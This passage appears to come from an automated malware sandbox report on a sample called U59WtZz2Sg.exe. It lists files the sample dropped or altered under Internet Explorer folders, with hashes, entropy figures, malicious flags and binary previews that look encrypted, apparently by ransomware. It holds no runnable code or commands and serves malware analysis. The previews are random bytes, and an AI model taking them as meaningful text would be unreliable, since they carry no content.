Preview:	<rootATf.W.N.....m...Z..4...z....k..^HR8.(HK.!\.m....)Fj..z2(...f.(_3.Pt.,Hy/.Y..t...w....5(.9.g.........bz:R.....>.V.x...U .y..#..t..4!n........&..?...3v.... ...cP9lC_L+.D../.D.\|.(."\LO..9h...]~.Z.W......y..o..3...W..R...K....8.W.?"..kv..@r...{>DmC.vCh.....Y6....>&z.y.........1.,.LI.).'..d....,....,t<.!....#H..(p..ln",,..5/.7....ts.M....p,<...LzU.8?I.....va{..c....x....J....Eg.3?.h..S..._.`kP...v..C...8...2B..>......S....C.i~....Y......5..........&n7 ...q..r8.-K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DSW732N5\www.google[1].xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	347
Entropy (8bit):	7.249236315303443
Encrypted:	false
SSDEEP:	6:CO3csVoqojCXrH6RUiRTKV6cxNGiZ+rBmBn5FrJ5pVvpFoyLJJXzGxntHcii96Z:COssV7ojSjSUQgGiUVmB5z5vpFoyQtcq
MD5:	DD08E9D7E3259CFF9013B3DA57C52E11
SHA1:	5794C31990BE5C99A357D2CC70EAD4C95BF4BEE1
SHA-256:	7C1987C37A75CE4656D7E3B5B5E6B19C0FD18CE0DF89CA034627E125D556F602
SHA-512:	B043FFB4A04E9D3116EDD2E05406A23E42837249A3F10495C25B9BC591D6370EC6A6D8DF80D0A0770834529A236C59FBE0E70F33E3A4813CA718C82B1349FC98
Malicious:	false
Preview:	<root..t....K?.Gjyp.T.n......0..u..q.!.r.{...{B..f..P..}.R.ED).\Td..w)&..E..9A$I/c.....H....yYF.X......6f..4.i8.'...k....p.lv}.4....WD...K..........U...k.7.....$(.....LV..5........&N.p...fB....P..,..aN).........}./....M.-%y..Qc.u.X..>P....[.#*...O.W!....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[1].xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	347
Entropy (8bit):	7.29246579235191
Encrypted:	false
SSDEEP:	6:Bebwtz245VZuedWmeHHjkiIksAiWcwspb0viR//P6Ld7XcGxntHcii96Z:Qbwtz245VLeHBNs9Wib06R/27/tcii9a
MD5:	C2A6E1A0D9D71A4644D05F844FE1FA84
SHA1:	E373B57CCDBD0F49218A526BA6B66804E7A5B92D
SHA-256:	F99A9FA48EB1A17B8CAFBD62F01079164211EE865DAFC44D4DBE568ECB92BFFA
SHA-512:	777A7848B2546537E20DF14D64459BAE0AF5700DDCBD83D106D9732758578A54893E0E57DBE284167D435FD662B3B19F72C999509F444E2634829A42D13F430B
Malicious:	false
Preview:	<root.*.:.#...z..#.J..U.so.d..M'rR...J..:.q^.U3...w.UT.d[Q..+......oJ9...x.f........_$...j J2.].C..>.55...}.....v.T.RQc.t.C..7Q.=..:....4....a.M.\|1z..P=fy_..n.,.f.d.......c..Z...?..D.......`d.U..[..Z...I.f.D...%hl....#gXf.,.....C.ycd.P7.W.4..d...\.......K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	347
Entropy (8bit):	7.263693969614671
Encrypted:	false
SSDEEP:	6:P+edZnNXkFnUw7udHMs707s4+TqVSwdBvAiGxntHcii96Z:Gez8csu8V4urnvYtcii9a
MD5:	3C425A5078F89CC8AC137D2615F231ED
SHA1:	305137F62E7F124119B6469D791F424B453952DC
SHA-256:	96BCDB7637B11CAC2ACA36AD3C9DAF4149F269127B2E79047334FFFF5B635181
SHA-512:	9AF2CC8817730A9B400ED075AC7B7DD156AF863D9FE6C736F92651C9C5D23C1916B4E49E6A8A3540FEC95DC437EA6F0BC3AE09C20BCF618AFD0D254606BEC198
Malicious:	false
Preview:	<root8axb^...uk.{.....I..5)..{#.@.u..6Rq.'.U{E.......7g.S.[.l.&_.`..B..G...&.....6.C....t.......3...v..pCc.B....d.)......&..D....U...s/W%..&.v...WN8.Ab...i..*..t..I<.]........%... .+.b.&.>.i.%........x......%..y9.l\|.yUq...p.c6.=..+..r/y....i..&#C+..~.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\en-US.1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18510
Entropy (8bit):	7.98898587664022
Encrypted:	false
SSDEEP:	384:Ii1k56iHYAk5VBGstJpDDSid6kKAgzsKFC8Tjsm/cy:bSFJSvGsTpnjOXzs+htUy
MD5:	3EE52711A2E802EAC58E2157010A51A1
SHA1:	0917083660054862459202FF178805FC080DF3DF
SHA-256:	9654571600D439D730337D7D56DE21EE2D3BB89530ABBD638E8709292EC53224
SHA-512:	A5524EF05DE9BA1EE4DF3F1AEBD709BD261B108B64807773D2474C61D3D6AD5035CEFE8F7123B80FE5A29FBD64CE3362587D2876734DD885F788EF2796445AED
Malicious:	false
Preview:	8...L...v<UV....(\|..g./...N...O.G.w.....\|.s..s.....c...Kfr....=...f........<......~b.......Tc{...mM..Yz..ns".R..).If.. ..S9{B..NIL..Q.........p~.I8.C..~..>~_27.....i..v6S......=..M...........Esk.....W;....l .U.4.C.U?....g6..]}.)+..l..).q.z..l.-.. ...E.....p.4.....z/.v.......P...,.n6A. .r.-..V.................p.H5Z}IM?l...5.1.+.....)..m...Q.j.-.m..1..$..Z.........=]Rv...Pt.])..Zq...HC.uVL\&.6...Y.t.v...Q.E.x..,... ._k........H....Z[.bsy.O..X....{.._....n......9.v....R.!..f_...O..."~..dN.'.3R).....E.5.a..>eU..jew]z8....R(.m...P.@.8.M...`.,...9.....@...ZB.8M..M...!...V..al.J3.b...3....w.d.b..._/....zF\|p~hW...fR...U..y.J.4...k..#.i.&..S....$..ZMP..6.m~3A..an....M.(...O...Y...+A.@z..mM.I+..aQi..9.s.K......v....;+.."..7P5...........^........0...\|.1..QU....B.=......?.4..._>c0..nC.....~.$...S.$..._t...Q.O...p....5........ps..Z..9.wc!.T.>jxL.[...u.3.$.B....mt........8..~.....W...Lgr.....Wmg..c@/a ~~r....(...o....ex...\....1..k.~....

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	234061
Entropy (8bit):	7.512176126745377
Encrypted:	false
SSDEEP:	3072:iBNnI6uIo66ftg6cYUIXKLjJYyb489RNkXQb/Le6q/By02r:iHnI6St8PIXU5RN/Le1Jt2r
MD5:	B0FCB585B2DFE520E81A2E7342BBF526
SHA1:	AF0A9176C8746C7B0EFEDC811879D4F5A769F361
SHA-256:	D3F8F1CA7538635A42E02A6DF08D228704B644542CB87032E263F39FB3C1DED0
SHA-512:	68CE314C0E629EB2B6C5C0A799F1BA8711BB3648917E17DAD10DA43F0325FA6F83DC58A7B97F0924033E1C54E8760798090DFD29E994AF0909DF86FA1C8B6A18
Malicious:	false
Preview:	.<?.......(E..o...I7..\|]8...\|d..?i.~..h.%...V....&_O6m.T.!..w..%PK..0...uq......U._.D6`.s.............y....-............._.Nq..X.(H..b....T/f#..3k.......c]N.S...r...zQn.4J.;.$.W"... .$.U...>.BJ......[.~d.Fb8......D.$....Q{}..$....ek(.l.I...)E.........L...U}..i3..w.S..(5ex.6wT..S}.g..r.]..@..\8.^.@:.\|S.^.....B=...>......]....:.2....oe*....#J)....\:O.2..] ...(...?(..g.@.....D.6.E;.. \|D.8.M.LO.......\|.T..c.M,.....JL.9/0..X.E.....+.jJ....P.:,....I............;...... ..\|.I..L4.J$c3.t.M..QR_.9,.2N.z.w..M.e..][..0.2.....6.n=.....U.......V....`.a[.Z......UL.3..q...P.%@..m":.~.b.?f.7.Q.'ZNc...9kN..&2....i./.v$...f.JO........,m...v...\.......Xe.....;u..#...G.\}y?..@..~...1.......E........./..YE.A].$9.9m_BT..1..<cE...#.'NB..-:.MLv..q.e....V.'A.\......$E..A..a...4C. ..p../....}.....D......Tn....@m.PH@\|L....hD7...R0RuP1..h.@..q9.Wz.F.n(..E.l./...^<5..4..\|.;.uy.}6:=..E..Y.7.\|.......@n....fJ/...:.q..;0M<.=8.i.9.Fj.[P].^B.gS...J..&P..-

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.99615692743123
Encrypted:	true
SSDEEP:	768:Xq5mJDqyUSSZJIoolRu4T+pHoU48HDdK5lAYSmIEsgPQNUqRDkPq0suIjJV:XImJWvZt0+6UFHxK3FhIIPQNTQq/1
MD5:	03E6C42C86D106BA7803B2C4F37792F8
SHA1:	5696E3B1A19CD40E953EDFB525FCCC802140D57E
SHA-256:	50081FDA7DA68FA5925CC357164460C30F105CE0E1DB8ED9D7FCF7069C40A862
SHA-512:	43951044B29A26DE24C7286D5A2DAE2FA6D3F3604EB06191450C3E96CBBAE3BA7CEAED23754CAFE0528F5589C289647DD3BCFDAF0736928EC6B2DF12D91C7A0F
Malicious:	true
Preview:	.....E..X..\..p....w..J..'.....E<l...{b.~.".C....K..V...w.Y.(p ....!.].... 5{...N0S..TE.h.g..._..~C.....,.cdf..?.AM.y7......m."..+..B....mrOI2Bh.V-!...X.`(..m..v5...CU...E..~.....]<.+.'.O.A...}.iG...%oSl..I.....L..._.>.....L..f...+.;9.zt^j....e...u[.....Y.i~.Z....Bv.D_.b.ie..9.c.1^M...n..a...e,Y. .....o....E.y....R7..e.E..W.;.`..G.>.7.s@=D?F,..\W..2I.:.~.+4....r..~../Q&...0......l..<4..7....\|..)....a.. .(...V.<.RQ......1,...(..Ba..FLW.K...P.].8.B.E.hL. .d.=....]..Z@.V.%6..\|2..:v9.3..Xh....y:.5.y0"...]....e....^`..XIh^.,....)......D\.(..(g.7....[7.ri.......X.....'.>t...V......?:.^.h.zR....8.Tkv_h.....k...].&Jh........}...mt..`.%W.y<^......z&OK.{.......m>.2$.g...].]oWyy7.'..L.}P...!.J....v8..6..tc...^...".V.?-.<'.~...S....l~0f=R......=~././!.......Z.w#.f.60z.9....V.........c+..[./h....w..R.~..bG..>...I.......O8r.:....QE...^.G.*"5..........wyH...q........ur...........^;e.x..H..^.N5.%.}....^..4..!lO./w...w.8+..D+.7...b..g}..].7$.1q.5.{..?.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\RecoveryStore.{5BAAF43B-032B-11EB-90E4-ECF4BB570DC9}.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5966
Entropy (8bit):	7.969389073304603
Encrypted:	false
SSDEEP:	96:LnJAKaQHUpFTn4yMdlr57A53sn1H5LZ/QsW/KfDUCHEjKnAXusTNmGsRqP2S7PO5:V530a5A5sF5pQsWifeKNLRDWTpaQFfy
MD5:	3A04446AF674049B66AB5EEBA64A3054
SHA1:	A3E875C4EFE40EC4D5D49B7D1E0EFCEF3EDDC232
SHA-256:	D3D66436335B2FC113E1719790647D64AC67E70EC78EB9784D53346DF9F56A3C
SHA-512:	2CFDB9DFFF7C6FF5993BF092753B6B69BCC43E40914DEF5EBF03996F45F5492BDE4E4A2ABAC64B2B7F662D963626FC30D71CA7DECFDB14E88E8876411BF3BC87
Malicious:	false
Preview:	..........26.u.j......~.h%.._.H%.e.r.....oM...8.;l...DBh.e^....Am....s.kT:..#(.(b...,...{C}.e..V..B1`..=.....7....RI..W@..]....m?......P...i+......?s..~....W.1.5..#.......O..~..Z.W..R.....O7..}kt..Y.IxD..}..Y.e..\Fr.1Q{'....G..(v....M....+Z.-...r..........b..H..`..]..6.O..l...>.v"...')..U...Y.....=..R.+Yo.E.w..&...t.7..m..,....%...n..r.j.../......eo.Z..vO....$.b.....>)...9...WHBi.y......a5...K.X.8.;.=2._.B.?.o....tN..;+}d............56w.L......\| 8$;......Tv8J9.[.<...5.]._.........C2..I.E.)........]..Wh.8.3.}.WnD..\..'..b..G.).+...k...>a.>.~.O..L..M...H..juo.~...&..P.4.Q..P.K..)..O..m....-..w.:ls..R.^D....T....r...[.#:.../......D...t..6.EI&...s..2..,...3..........t!VK.+..jix.(\z"-....e2.g..\|.!...3..T.D. Sn.l...W.Gl.HI.!..........W.f...u....$V......D9._}Mi. .fbJD{......g.....(.....m..m ..O.....R.f...=...r.K.\..f "..B....Z,..?..r.z...=C7D.:.T!$v....^P.I.Gn..X.F.L..+.6..FB.?...'.m.l.m. .,...z.{@d`.....A............r..(-.Xg......!.Z........

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\{5BAAF43C-032B-11EB-90E4-ECF4BB570DC9}.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	21838
Entropy (8bit):	7.991223094299256
Encrypted:	true
SSDEEP:	384:atqxgc0Ubarotia/wuegyseDv8s+SQS/SH/OolvGfoth1ISNdOFND273kTkBX7c/:atZc0US2V+vvGS8/Gwth1b+03cM7cAw
MD5:	14B47A2F494461E9780F9983622ABCE3
SHA1:	C789603176AD30827EF3B117D0C3E02C3B137552
SHA-256:	13FB1FB32713EACA59FCC070EDF2F99798454936244AEF02B018B973AC092DEB
SHA-512:	7DC1DB684E9E3EE9E9787557646DF4AF2CE06F3611FFAA480A46B5D1971560572819930F9BBB1E09D4607FFEA99C24CA6E4CFA657FA9411F5B92232489DE58C7
Malicious:	true
Preview:	....u........}.y..\|S...v;..M...{..i......\|..%...W..)..JI.\|... .5z...[......{...8.=.q^....,...gj..VIH\......1....A.a.;.....$......z.8.).:Y.6.c..LM.U....(lW...... .}:U%.L..W......S........8C..4...!...._..V........z....)....AG..S./,.Z....<.4(....7e.....[_2"UW.....k...y..p.-Q.(.z7....v)&..<.... \T..`....ck.).Y...9.!f.'.g.....&..1i....`o.j.p."C.rG..?...c......ihE.u..K[..=./a.'.P...v...+......vQ)..i...x..Z.0e..6..fs>..gF...Xa.jQ...3$..7].9.... .v.^.h...........!.... ....~.B.._w..S...e........O7x...D.W............QC....@..1.4...R..,.q.....].?.lGH9N.\|".../S..../.........m..j.....\|.Ig....)..TQ...'o....AC...M..dt:#.%G..{..F.......~..W.p..+.d.&.v.JC....s.F.y(.W.h{..C..HCP.....N...,nU..i(.z.'K.)R..C.......I....)1...9"......L+.^..19pU...f.#L... ..V......J....\..a.3..`........+.Pt.m=.W&6&....f$z...n@....*.~...e..J.?..{D.` ..j....n+^..3.!...0.68...2....n.):...7.oDm..L!w.0`B.Y......<...P].....\....v...pt4M...I.s..A..z..~.O...V...Z~...o.{:

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\{5BAAF43D-032B-11EB-90E4-ECF4BB570DC9}.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	162638
Entropy (8bit):	7.930876279611713
Encrypted:	false
SSDEEP:	3072:iCbA58EOi0M+Jmbz7ktTQa2tMiktVVneCDToj2QSA+2mX:iQA5v7YJCMtTr2ytVVeCfoj8x2mX
MD5:	6099B4987D5BA0737CB56F74A8FC0411
SHA1:	AA0CA3012DED3184311F414F5E960D8806AAE673
SHA-256:	58A100A4BA7E71B45CADF8D1C29B4EE10A44D57E1E054FB7D9DBC7937806420E
SHA-512:	23DEEAF14EA71ED8CF7BE3A56D21FF3F560CDBC636216142A939F535B2EF8A3119A6E4E71516F906739FB5550664F291E1708C722958B164141D857D16AF4D82
Malicious:	false
Preview:	.....W..W..5j:.... ..f.dT....&....t......{...z!@.3...,..}%+.^+x.\|...j.z".z..9...SB\|'....O..6.R.'..;...........\.&.X.d.`(X.8. .b..z].c.......g...E."=k.T.v...}...?...:..A.w6....O..(...m.X.......?.mLZ........r..q...tB.../0.T..Og.]h..d....=WlQR..24g4..VK..%[5{....~-......4.1[.d.pt8.0,u.....v.0.AG.I.#..V.9..e..)..X..Z ......?.$ME...c.g.]........k"nw..bM..2.......:.\...C...Y?..E........w..6."...sCRVf..d.d...._K}.3.D.k>..!..9.U{....c.@..E..Z.(n.4ze-.e.M...zV`XS..fW.......-Sq...M.....p........KtEO]JG.D...P.Z...x.C=..p.Z.......sW_...P...._,.....CO.g.qE9../[`...v....A......l...7.T.?\).@1o...dx.....\.Y......L..Ou...w-.A..O.....x...Pq_.sT.....#.'.8..e..9.....5..x.UJN.j.d.?.:......"..z..m.Y. ...;iM.U$...L.....1.....~Y`!+..s..C.......a....j....$..}NP..7G...W..LLo.@X....&.3.....:.M.x.....S/.Z...:.y...f.Q....S.....~.>.....?......wI\|.v.Q...q...v\..0.@...<.y.S.{D.G.L.,.q........4...%..8^....@G........<j...3<..R?.O\|..j.......\&.H. e.R.D...C....(...............(IY.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\RecoveryStore.{71FBE94F-990A-11E9-90DB-ECF4BB570DC9}.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5966
Entropy (8bit):	7.96559147446711
Encrypted:	false
SSDEEP:	96:lwsHgjCCh3n9jJkskhSKA3PPi5z0q+V5Pf+NPmnmBGcfQT1IsMLIJQanbV8CFcKP:ljAjCOX9j1Kguz+Pf+NPmmocYhgWnbeA
MD5:	53D1E191500ABE700DF203937352C7E1
SHA1:	5FE77C1DD36587C207AFA8819BF614B9A47948DE
SHA-256:	BCFFE109B30FA36B8B49735D64C08EFBC614589D2CD44241481AD737B366C28C
SHA-512:	ABD7E8A89BD6ED0C5B69F3ED2447C2A3DDEAA7811768D33DBDDEA5753360AEDB46046687AD8DFECA08EEFF4D184BDDAC7B7667A77095C04905E089751E346E1D
Malicious:	false
Preview:	......JQD. .v..u.c.A.....J..6..Ghh..R:.....o.....y.....22..o.{/.XD.z....!#L}......I......PFG......!........f.Z.Q{.n.e/S.vL.\q..l..k.!...6.....`<H.P_zb_.....Z.G..o.3.ih..W2.1....L.....G&.@\....$b.WF:G.J....X!...B0.;,b".:.Y.....V....2`v.Ga.t...'0.....Qt.c].,V......8..`.4.r.>...#h;..L...}.wD.^g...6M...@...\|..P.q........gx.y.Z.S.tf..Yk.j.R<..?^&o{k.`.%.DHU...o..aWc.........o..(.A.\..-..D.\Ir.;t..7J....p..tc...).......n.8...e.PXg.O.}......hok..6w8C7.<.J..S.>....CU......cd.x..:.R....z.y.l.V$...\|..{Q}.4....+.....M..;.G...(!..8..........E..<.Z..b._.O.t.Q...I..........8..H[j.I.@_[.&i`...i...[[!.c.>.PO5.....v. .s{....e{..yQ.IC....+.ef.g.....d....Ys...9>. s.fAldw.Eg.3.Jd".{.."...o...<.j...o.g]..-..A...X..I{{O7m.......X...K..g.....(+<2......a54.....[..)X.Sa;.h....G.-...);<@...MDh3v<.sF.V.a.(?.x!..,x....$JV...a.P..R.<..e6#.!N..)c<k..).*.+...(#.O..........L5.~p.....}....D....VmoG..w...(.Tz.k.l....18...\|_.....6....C.._........{..`.zU.rVN..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{7B1657B8-990A-11E9-90DB-ECF4BB570DC9}.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5454
Entropy (8bit):	7.962569968892865
Encrypted:	false
SSDEEP:	96:i2B5Sq7FVVyLZAbUgiuOAA8I3kfYBskWrPfwwQ3/tqBWI/ZbU6FX9T:/BRHyGbdiFP3gwoPfCqBQw
MD5:	2734315C164E0FDDB94FCC61184F2B01
SHA1:	7FE1D497B4AF8230FABF266FEA1281ADB4A54753
SHA-256:	8702BD43DDFDFDD04554673F996215B38F33631842928E742800FB200935EA5A
SHA-512:	20FDF0D9A4F050F43C7CD62854F3B0655C293E98A47F1B4D02F7DDC9620D170C4CC6DE72634A7CBBAC87D6EB1331AFC85D04DB2A90D8875EABF843957B93FDCF
Malicious:	false
Preview:	......#..Z.86...i.kA..}... A9x.#...+...}...F....E.{&.1C.7?B"....v..<9..x.h.g...?.9.x...M..=.B.[^..[......i../.Ox7...r.....!.Y......J=.q.E .C....ZA.k.........ay.../l..._.V.xG`.m........P.FW.d..Nm.=.......V.z...{..G...H..@..GK.e.4.:..q....4..i......A8m~....%`..0....?.-E.TP..2..!..=.v;.5.........k7>.....un.....h.....2..t..o..?.. ....w[t.....P4G.k...."....+.\0...\..[.Z...S...{x.M....T6.9..7........V.......Wb5;E[Yn.M.......6g...(...x@..... ......}-R@.W.......L......Je.8.\|..v...........H...?...\|...6.$.....u..N.....(R.i.t.Rh.!.....W..bm3R.......:..fW.,6F?./.?....I..x..=..A%.........8...'$T..gB9.4C..5s.o....0...&..a....:.#U......&.@-..7..1.gA....t....$....+....Y5e/. .v.{.t...z..<=`.I..S.....S.......U.\|.A0.}.~......k..~.._..c<K.p.4..+.n....%.O........%[......{?~`I..K..?..C+M......:.A.FA.!a.c.#K.h\.P..J.N..@D..\|.jt......J.n*..V)..m4.....N.4.h.K4+..+O....F9.Y J....<..l6....._..........C..!..^.$D..vdp.8.&..x.9gA`&.#9.e.T.pw..>.fu>AST.......y1

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-314712940\msapplication.xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	745
Entropy (8bit):	7.6772021031852695
Encrypted:	false
SSDEEP:	12:DItpRzpZ/NTac+3zz18Pzpr3XtFVFZNSYQR2O+qfy7IsiHLT0IpkjVQnD3Ntciik:spZUL3zzMzZdvbNSYy+78sKF/bD
MD5:	D460B6F484E8606E797C1346440AFCE0
SHA1:	CE6D2AF2533F0EAD7A48F2F7E355EDF5BBB11818
SHA-256:	6229F094D262009C06207255C5B19364D3FD76B7E866764273E915748FBF39BE
SHA-512:	E8F1764B68877E2B7ADB44C0FDE3DC502CB2E86415D498621DB619631B571FB898E4FC8357A51E5ABFAF4846B067BD02C825E5384F07AFAC8116C0AFE136C929
Malicious:	false
Preview:	<?xml...E.-.6......x...{.A.fJGc..~n.o.,.!}...4H...Ah.g....]p.`./...Lr.!..[i...........\.X\.n...Y..%Bq{.P.SW.....:{ .7.k.z&.O.N.]6&..y....XX.!...i?.....?.w1F..1J...K...")....G5..$>Z.....`...I5..7..g..Z-.U.;n+f...P_.@7....B...x.......\|..U..."1.j...p..RB-..y.q.%:..+u...t....jiW<.@.CY..y....^F.z.p.Ur8.>CK.b7^6).C2.]..pW..d.Q-.A. ![/a.]\e.V.d.^I.. ..(zf\|.0.O..#....v...D...z..J2..B0.=y.o^;2....O.,...1.\=..b.<.W.?$......CQ17..W.uNrB.h'....hF....5.........-p.@.O..%U....hC{.mY.M~..cZ..y...y..8k...%...R...:.....oa.f{a..8.....5....Tj..\y..NB...{...C...H.q.\|?5..."8....!........0....>..Ix-.1..9uN...G8....-...djj;KO..F.#.V.-}....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	35951
Entropy (8bit):	7.994429666223941
Encrypted:	true
SSDEEP:	768:qmeMTWlmMkD4gKi9yQnOM4Spzyf3V0swAeadCeE8BegOMweyghonjqGaGruWu:q9W85i91OM42Wf3VQXgj/GHruWu
MD5:	B64F56483AB02C9ABC3F0ED585A87535
SHA1:	3F2265D77188670DB8346675FAAD88D48A5175F8
SHA-256:	98017C9079A915C55C8558CC4B1B13BC64A828DC4488C1941C2E19DBCB99C4D8
SHA-512:	CCFD036980B082F1FC14D5D6F6E342A7A058C66032E7470D4069281239E2331B2AC80C738CDE41A5E4E6CAD85B0F55ACAE2A7DD758C55121B5E4C7C706DA0561
Malicious:	true
Preview:	.....;v.u.(...'[...@'.2A..,...r.....'.J..A'e#..S..=......r.2...}..W.^.w.X....... .<>.....s.z.l....:((f>9....>.].t...g.i......=..f2..u.~m..=...M....7........J..S.R.,.....d..Ox...}.j.p..12.E!..l.}.\D...Y.n.V....Z...U.AB.\....w.......j...U......~....T,.e...e.;..S$ ..EH..p..M......XA..d.....)..v:.#l._B.q...'.=..$%..aWj......#qp..YQ.0.v...V..}.WW?US.U....=Ju.9[,.wX..\}....u.....U$..Jxe.&..+E.../...av"....i......A\|\!r?..........U..\.......>z..jC..F..u.y{..V.."......k.Q....-$b.....1..$..s...J.... .C..r.EA...X\|0.X........(..7..b.=@.xT.ru...F....!7.b.)..$!..).9&XM.......XD:...=:.iHb..XD#Y...b5.....F&U.s..\.._.8....4.......7:k..)1.v.#4.....q...u.....Y.3.....Z/.&.\....r....\.jpE...Q...Ps....h...;\|..........9..A.......4.l...evCQ&..b..c.,.p3..\|......{c.y..2....{<....%6.>.!EDq.,).`.X...+.....:X.I...K.W.5...#..<...Z.........-...a...d..H........w>y+..B.o....V.\|..\..K.S..*RH...c^..<eil.7.$d.o..g..WV/..TA..m...S.j..=....6Kw.....c..G+.=

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16179
Entropy (8bit):	7.989520664616215
Encrypted:	false
SSDEEP:	384:xQZSZl2qVAfFoI2zkezXD7ZyOA9mjmzgV4+o56CYEf8C4pHbDJaxy15jW3:xE7GA6ItezXEG3V4++WC4xbDJhA3
MD5:	D246810F09FE5604F6EF5AED9EE2E799
SHA1:	96C760B0495ABCE1549E8D8D13244E07BFED3A65
SHA-256:	434EA406AF30360142D621FB15FB282DD1D30B488E2029FFAFBA790045FCC2C0
SHA-512:	19C510D464A7B736C6BAECFA22D1389CAE13C7798443F204E57875057732071781E029C9A06CA5F1EB97AB52A0B9BCFBFAC7ECCF15C61750E24CD003C85B15FC
Malicious:	false
Preview:	.<?e.}n.]..~(...!..ao..#.5..0..'.&.kI..@..M....x.zQ.+....."b.I...By.5/........P<.,<W.$..h.z.^.sco..g......M.W..j........m.."5(D...5.6J..\.~.S.........GJ...x/.k.Z..&:i_......L..&.,Et6..cjM.....v...d].j.@..G&X...A..6....r.K...d9U..?o...>..]...?c..2a.R!.(.....<.n.!.@}d.o)....$..[.).&.OvE>.w.).n....%.......)9J.~..@....t..N... ,(...5.ws....G...S....e.}T.....u=X.W..$......9..%.._n`5.....#iM.9H..9.z.,.u...)......t.B.09..'..w....8...o.0E.t5.NG.!."..sCr.h7.U.....0.qa..z.....+....:j-0...=.\|.N5......+zO.l....;...w..S.n.xb...{..!..b.k.1.H...VY.~......[....(.6.Y...V.o... ..s.99aT.e...l.9..#.=,..ICw.8....9@.......-.F.&"n.......y...v...J...1?.#..]>.%..H.9M^a2.`...G.cT..f...`..{...}mdC...W..jPw...~.}V.....A.......~.....g._\.G.rx.v~3..#NI.....d....4....%..Q....[0._.T6\|..qW....> .RDX.........H....@KS.B6,:.h......DBh.5.L.3T.#.9%....!X=...61.......n...t.%.x;T.8.<#....o.Bu..cN..-v.d,....OAy..) ..q.....5...$..O....!.o...%fk,.mj._.....y\|..w.R:...

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6907
Entropy (8bit):	7.974125455698889
Encrypted:	false
SSDEEP:	192:cIJTOEi3mtH5K+W0/dlpWbJUyNRK9aKeA:XJTOb3k8c/5WHNMazA
MD5:	92DF82612FEF432B04F657C5E6A8B10D
SHA1:	672F16CB63D0E2809E149EFE3C35F4E085E1B854
SHA-256:	C3314C77E478272275EABD23121184EFE5FF8023B559041B041B8103CF6EC659
SHA-512:	37722B95F246BE2BEA573D53CD951BBA7EE3B86AB523A56B536D3031B3EA4C173D04BF33B9A33525A31C6266A9B043157E19C9A211922DB25E18897D5585F4B3
Malicious:	false
